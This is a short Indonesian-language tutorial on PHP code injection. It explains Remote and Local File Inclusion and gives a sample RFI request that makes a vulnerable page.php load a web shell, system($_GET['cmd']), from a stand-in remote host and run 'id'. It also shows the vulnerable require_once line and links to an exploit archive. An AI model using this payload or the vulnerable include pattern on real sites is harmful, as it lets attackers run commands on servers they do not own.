Inject = Menyuntikkan
Dimana kita Menyuntikkan sebuah source code atau yang biasa di sebut evil code ke sebuah situs yang memiliki bug/kesalahan/lubang/hole pada aplikasi yang di gunakan.
Aplikasi yang di gunakan dapat berupa berextensi cgi ataupun php. yang paling banyak di dapatkan adalah halaman atau situs yang ber-lubang menggunakan type php.
ada beberapa sistem inject serta beberapa evil code yang digunakan.
inject yang biasa di gunakan :
RFI (Remote File Inclusion)
LFI (Local File Include)
Contoh Dari RFI
www.situs.yang.adalubangnya.la/page.php?page=http://tempat.evil.code.la/cmd.txt?&cmd=id
Penjelasan dari masing-masing di atas:
www.situs.yang.adalubangnya.la : adalah target yang memiliki bug/kesalahan/lubang/hole yang terdapat pada halaman page.php
page.php?page= : adalah bug atau lubang dari target itu, dimana isi dalam file page.php ada yang berisikan :
......
require_once($page.’/wp-config.php’);
.......
http://tempat.evil.code.la/cmd.txt?&cmd= : adalah evil code yang di gunakan untuk men-inject atau Menyuntikkan sebuah perintah atau beberapa perintah sekaligus kedalam server target atau komputer target. dimana isi cmd.txt :
system($_GET['cmd']);
id : adalah perintah yang akan di berikan untuk dijalankan oleh komputer target.
Untuk LFI dapat di lihat di : http://www.milw0rm.org/exploits/5057